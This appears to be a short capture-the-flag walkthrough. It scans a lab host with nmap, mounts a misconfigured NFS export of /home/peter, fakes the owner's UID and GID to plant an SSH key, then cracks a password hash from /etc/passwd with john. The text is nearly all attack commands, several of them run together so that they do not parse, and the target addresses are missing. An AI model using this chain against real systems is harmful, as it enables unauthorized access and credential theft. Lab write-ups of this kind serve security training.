1. Net Discovery
nmap -sn

My target is

2. Port scan

nmap -Pn -Pn -p1000-

There’re 7 open ports: 22, 111, 2049, 35049, 38329, 57299, and 59475.

3. OS and service scan

nmap -A -p22,111,2049,35049,38329,57299,59475

There’s an NFS service.

4. Vuln scan

nmap --script vuln -p22,111,2049,35049,38329,57299,59475

Nothing useful

5. NFS scan

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount

There’s a misconfiguration. I can mount ‘/home/peter’ to my machine.

6. Mounting /home/peter

mkdir mntlsmount mntcd mnt ls -la

7. Add public key for SSH login

Verify user permission

stat .

The username is peter, UID is 1001 and GID is 1005.

Adding fake user

groupadd -g 1005 peteradduser peter -uid 1001 -gid 1005

Change user to peter

su peter

Create ssh key

ssh-keygen -t rsa

Copy public key to the mounted directory

mkdir .sshcp /home/peter/.ssh/ .ssh/authorized_keyscd .sshls -la

Login as peter via ssh w/ private key

ssh -i /home/peter/.ssh/id_rsa peter@

9. Privilege Escalation

Read /etc/passwd

cat /etc/passwd

There’s password hash of user ‘insecurity’.

Copy the hash to hash.txt

echo AzER3pBZh6WZE > hash.txtcat hash.txt

Crack w/ john

john --wordlist=/root/Desktop/rockyou.txt hash.txtjohn hash.txt --show

I got the password.

NOTE: I already solved this challenge, so my screenshot is displaying as I already cracked it.

Change user to ‘insecurity’

su insecuritywhoami